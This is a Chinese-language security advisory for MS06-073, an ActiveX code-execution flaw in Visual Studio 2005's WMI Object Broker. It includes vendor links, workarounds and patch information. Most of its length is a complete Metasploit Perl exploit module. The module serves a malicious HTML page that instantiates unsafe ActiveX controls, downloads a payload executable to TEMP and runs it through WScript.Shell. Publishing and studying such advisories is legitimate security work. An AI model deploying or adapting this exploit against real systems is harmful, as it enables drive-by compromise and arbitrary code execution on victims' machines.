安全研究

安全漏洞
Microsoft Visual Studio “WMI Object Broker”控件代码执行漏洞(MS06-073)

发布日期:2006-11-01
更新日期:2006-12-13

受影响系统:
Microsoft Visual Studio 2005
描述:
BUGTRAQ  ID: 20843
CVE(CAN) ID: CVE-2006-4704

Microsoft Visual Studio是微软公司的开发工具套件系列产品,是一个基本完整的开发工具集,包括了软件整个生命周期中所需要的大部分工具。

Visual Studio的"WMI Object Broker"控件在例程的创建和处理上存在漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意恶意代码。

Visual Studio所捆绑的WMI Object Broker ActiveX控件允许创建系统上已有的ActiveX控件例程。以这种方式创建的ActiveX对象会绕过ActiveX安全限制,如忽略kill bit和safe for scripting选项。如果用户受骗浏览了特制HTML文档的话,就可能导致以该用户的权限执行任意代码。

<*来源:H D Moore (hdm@metasploit.com
  
  链接:http://www.microsoft.com/technet/security/advisory/927709.mspx?pf=true
        http://www.kb.cert.org/vuls/id/854856
        http://secunia.com/advisories/22603/
        http://www.zerodayinitiative.com/advisories/ZDI-06-047.html
        http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx
        http://www.us-cert.gov/cas/techalerts/TA06-346A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ie_createobject;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

my $advanced =
  {
    'Gzip'       => [1, 'Enable gzip content encoding'],
    'Chunked'    => [1, 'Enable chunked transfer encoding'],
  };

my $info =
  {
    'Name'           => 'Internet Explorer COM CreateObject Code Execution',
    'Version'        => '$Rev: 4005 $',
    'Authors'        =>
      [
        'H D Moore <hdm [at] metasploit.com>',
      ],

    'Description'    =>
      Pex::Text::Freeform(qq{
        This module exploits a generic code execution vulnerability in Internet
        Explorer by abusing vulnerable ActiveX objects.
}),

    'Arch'           => [ 'x86' ],
    'OS'             => [ 'win32', 'winxp', 'win2003' ],
    'Priv'           => 0,

    'UserOpts'       =>
      {
        'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
        'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
      },

    'Payload'        =>
      {
        'Space'    => 4000,
        'Keys'     => ['-bind'],
      },
    'Refs'           =>
      [
        ['MSB', 'MS06-014']
      ],

    'DefaultTarget'  => 0,
    'Targets'        =>
      [
          [ 'Automatic' ],

        # Patched
        [ 'MS06-014 - RDS.DataControl', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],

        # Not marked as safe
        [ 'UNKNOWN  - RDS.DataSpace', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],

        # Part of the WMI SDK, currently unpatched
        [ 'UNKNOWN  - WMIScriptUtils.WMIObjectBroker2.1', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'],

        # These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
        [ 'UNKNOWN  - SoftwareDistribution.MicrosoftUpdateWebControl.1', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'],
        [ 'UNKNOWN  - SoftwareDistribution.WebControl.1', '{6414512B-B978-451D-A0D8-FCFDF33E833C}'],

        # Visual Studio components, not marked as safe
        [ 'UNKNOWN  - VsmIDE.DTE', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'],
        [ 'UNKNOWN  - DExplore.AppObj.8.0', '{639F725F-1B2D-4831-A9FD-874847682010}'],
        [ 'UNKNOWN  - VisualStudio.DTE.8.0', '{BA018599-1DB3-44f9-83B4-461454C84BF8}'],
        [ 'UNKNOWN  - Microsoft.DbgClr.DTE.8.0', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'],
        [ 'UNKNOWN  - VsaIDE.DTE', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'],        
        
        #
        # The controls below can launch the "installing component" dialogs...
        #
        
        # Not marked as safe
        [ 'UNKNOWN  - Business Object Factory ', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'],
        
        # Not marked as safe
        [ 'UNKNOWN  - Outlook Data Object', '{0006F033-0000-0000-C000-000000000046}'],

        # Found exploitable in the wild (no details)
        [ 'UNKNOWN  - Outlook.Application', '{0006F03A-0000-0000-C000-000000000046}'],

      ],

    'Keys'           => [ 'ie' ],

    'DisclosureDate' => '',
  };

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit
{
    my $self = shift;

    my $server = IO::Socket::INET->new(
        LocalHost => $self->GetVar('HTTPHOST'),
        LocalPort => $self->GetVar('HTTPPORT'),
        ReuseAddr => 1,
        Listen    => 1,
        Proto     => 'tcp'
      );
    my $client;

    # Did the listener create fail?
    if (not defined($server)) {
        $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
        return;
    }

    my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
      Pex::Utils::SourceIP('1.2.3.4') :
      $self->GetVar('HTTPHOST');

    $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

    while (defined($client = $server->accept())) {
        $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
    }

    return;
}

sub HandleHttpClient
{
    my $self      = shift;
    my $fd        = shift;
    my $shellcode = my $shellcode = $self->GetVar('EncodedPayload')->Payload;
    
    # Set the remote host information
    my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);

    # Read the HTTP command
    my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);

    # Read the HTTP headers
    my $headers;
    while ( (my $line = $fd->RecvLine(10))) {
        $headers .= $line;
        last if $line eq "\r\n";
    }

    if ($url =~ /\?payload/) {
        $self->PrintLine("[*] HTTP Client $rhost:$rport asked for payload...");
        my $content = Pex::Utils::CreateWin32PE($shellcode, 'ie_createobject');
        $fd->Send($self->BuildResponse($content, 'application/octet-stream'));
        $fd->Close;
        return;
    }
    $self->PrintLine("[*] HTTP Client $rhost:$rport asked for exploit page...");
    $fd->Send($self->BuildResponse($self->GenerateHTML(), 'text/html'));
    $fd->Close;
    return;
}

sub GenerateHTML {
    my $self       = shift;
    my $target_idx = $self->GetVar('TARGET');
    my $objects    = "";
    
    if ($target_idx == 0) {
        foreach my $target (@{ $self->Targets }) {
            if ($target->[1]) {
                $objects .= "'".$target->[1]."',";
            }
        }
    } else {
        my $target = $self->Targets->[$target_idx];
        $objects .= "'".$target->[1]."',";
    }

    my $data  =
qq#
<html><head><title></title>
<script language="javascript">

function Log(m) {
    var log = document.createElement('p');
    log.innerHTML = m;
    document.body.appendChild(log);
    
}

function CreateO(o, n) {
    var r = null;
    
    try { eval('r = o.CreateObject(n)') }catch(e){}
    
    if (! r) {
        try { eval('r = o.CreateObject(n, "")') }catch(e){}
    }
    
    if (! r) {
        try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
    }

    if (! r) {
        try { eval('r = o.GetObject("", n)') }catch(e){}
    }
    
    if (! r) {
        try { eval('r = o.GetObject(n, "")') }catch(e){}
    }
    
    if (! r) {
        try { eval('r = o.GetObject(n)') }catch(e){}
    }
    
    return(r);    
}

function Go(a) {
    Log('Creating helper objects...');
    var s = CreateO(a, "WScript.Shell");
    var o = CreateO(a, "ADODB.Stream");
    var e = s.Environment("Process");
    
    Log('Ceating the XMLHTTP object...');
    var url = document.location + '?payload';
    var xml = null;
    var bin = e.Item("TEMP") + "metasploit.exe";
    var dat;
    
    try { xml=new XMLHttpRequest(); }
    catch(e) {
        try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
        catch(e) {
            xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
        }
    }
    
    if (! xml) return(0);

    Log('Downloading the payload...');    
    xml.open("GET", url, false)
    xml.send(null);
    dat = xml.responseBody;

    Log('Writing the payload to disk...');    
    o.Type = 1;
    o.Mode = 3;
    o.Open();
    o.Write(dat);
    o.SaveToFile(bin, 2);

    Log('Executing the payload...');        
    s.Run(bin,0);
}

function Exploit() {
    var i = 0;
    var t = new Array(${objects}null);
    
    while (t[i]) {
        var a = null;
        
        if (t[i].substring(0,1) == '{') {
            a = document.createElement("object");
            a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
        } else {
            try { a = new ActiveXObject(t[i]); } catch(e){}
        }
        
        if (a) {
            try {        
                var b = CreateO(a, "WScript.Shell");
                if (b) {
                    Log('Loaded ' + t[i]);
                    Go(a);
                    return(0);
                }
            } catch(e){}
        }
        i++;
    }
    Log('Exploit failed.');
}
</script>
</head>
<body onload='Exploit()'>
<p>Initializing...</p>
</body>
</html>
#;
}

sub BuildResponse {
    my ($self, $content, $type) = @_;
    $type ||= 'text/plain';

    my $response =
      "HTTP/1.1 200 OK\r\n" .
      "Content-Type: $type\r\n";

    if ($self->GetVar('Gzip')) {
        $response .= "Content-Encoding: gzip\r\n";
        $content = $self->Gzip($content);
    }
    if ($self->GetVar('Chunked')) {
        $response .= "Transfer-Encoding: chunked\r\n";
        $content = $self->Chunk($content);
    } else {
        $response .= 'Content-Length: ' . length($content) . "\r\n" .
          "Connection: close\r\n";
    }

    $response .= "\r\n" . $content;

    return $response;
}

sub Chunk {
    my ($self, $content) = @_;

    my $chunked;
    while (length($content)) {
        my $chunk = substr($content, 0, int(rand(10) + 1), '');
        $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
    }
    $chunked .= "0\r\n\r\n";

    return $chunked;
}

sub Gzip {
    my $self = shift;
    my $data = shift;
    my $comp = int(rand(5))+5;

    my($wtr, $rdr, $err);

    my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
    print $wtr $data;
    close ($wtr);
    local $/;

    return (<$rdr>);
}

1;

建议:
临时解决方法:

* 禁止在Internet Explorer中运行WMI Scripting控件;
* 配置Internet Explorer在运行活动脚本和ActiveX控件前提示,或禁止在Internet和本地intranet区中运行活动脚本和ActiveX控件;

将如下内容保存为 .reg 文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}]
"Compatibility Flags"=dword:00000400

双击生成的 .reg 文件应用到系统。

* 将Internet和本地intranet区设置为“高”。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS06-073)以及相应补丁:
MS06-073:Microsoft Security Bulletin MS06-073
链接:http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx

浏览次数:3995
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障